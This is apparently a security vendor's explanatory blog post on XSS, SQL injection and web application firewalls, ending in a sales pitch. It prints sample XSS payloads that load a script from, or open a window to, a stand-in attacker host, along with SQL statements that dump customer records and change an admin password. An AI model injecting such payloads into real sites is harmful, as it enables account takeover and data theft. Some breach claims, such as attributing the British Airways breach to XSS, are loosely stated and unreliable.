XSS, SQL injection, and WAF

John Baldock

XSS – Cross-site scripting

XSS is a common form of injection attack on public facing web servers. Any web server can be vulnerable to attack, and websites now are feature-rich with multiple embedded databases, comments sections, and media… all of which increase the vector types that can be attempted by cyber criminals for various reasons.

For example, a website that contains a simple comments section might be exploited by a malicious user entering:

<script src=http://mwuhahahaha.com/evil.js></script>

An attacker can even sneak in redirects within IMG tags:

<img src="http://mwuhahahahaha.com/so.evil" onerror=window.open("http://mwuhahahahaha.com","xss",'height=666,width=666');>

These are just two examples of simple XSS attacks, but there are hundreds of ways a hacker will try to exploit weaknesses in a system; probing and testing every potential weak spot until they find a way in.

Attacks like this can redirect users, deface websites, and steal information that was not intended for the end-user.

In 2018, British Airways suffered a breach of data which saw the personal information of 380,000 customers, including payment information.  The method? XSS. A few lines of JavaScript cleverly crafted and injected through their public-facing web server.

Cross-Site scripting is the number one weakness exploited in web applications; and attacks of this type have actually been increasing, not decreasing.

In 2019, Fortnite suffered a breach of data – private data of 200 million players was exposed. Again, the all popular XSS attack method was the primary vector for this breach.

SQL Injection

One of the most popular database types is SQL; so naturally, one of the most popular hacking techniques for stealing information and gaining access to a system involves SQL.

Consider a simple login form on a website that queries an SQL database: if it is possible for a web form to query a database and check for a user and password, is there the potential for a malicious SQL string to be sent to the same database to modify a user or list all users? Yes, of course! Any public-facing database could be at risk.

If a user could somehow send SQL commands such as:

SELECT * FROM Customers;
ALTER LOGIN userName WITH PASSWORD = evilpassword;

This would allow them to view database records that are meant to be private, or change the password of the admin account.

And this is not unrealistic, massive companies such as Yahoo have suffered data breaches thanks to SQL injection attacks.

An SQL vulnerability scanner could be used to check the safety of your website if you have immediate concerns. But SQL injection attacks can be very sophisticated, organizations should adopt a far more complete security solution than relying on a single scan.

SQLmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws.

Web application firewalls – WAF

A WAF inspects the HTTP traffic to and from a web application, and can filter, monitor, and block traffic if it is deemed a risk. A WAF can prevent SQL injection and XSS style attacks as it can see when malicious code has been inserted into the HTML that passes from a user to the server.

And that’s not the only way a WAF can protect your website, a cloud based WAF solution sits between the user and the server, and can therefore filter by IP address. This means you can avoid traffic from certain geographical locations, or blacklist by reputation. Additionally, some WAF solutions have DDoS controls built in as well.

CyberThreat real-time map

With XSS and SQL injection continually being a nuisance for web developers, and new methods to bypass controls constantly being found by attackers, it is essential that businesses take the problem very seriously and ensure they have protected themselves and their customers from data breaches and other forms of cyber risk.

A lot of attackers use automated tools and programs to scan for weaknesses – our WAF solutions use hidden background challenges to ensure that visitors to your website are definitely human, this is just one method that can ward off unwanted traffic. As well as this, the application layer commands that are seen from the visitor are inspected and blocked if they meet any criteria that deem the traffic as unsafe.

activereach are specialists in WAF, DDoS Mitigation and Breach Detection solutions so give us a call on 0845 625 9025 or contact us to find out more.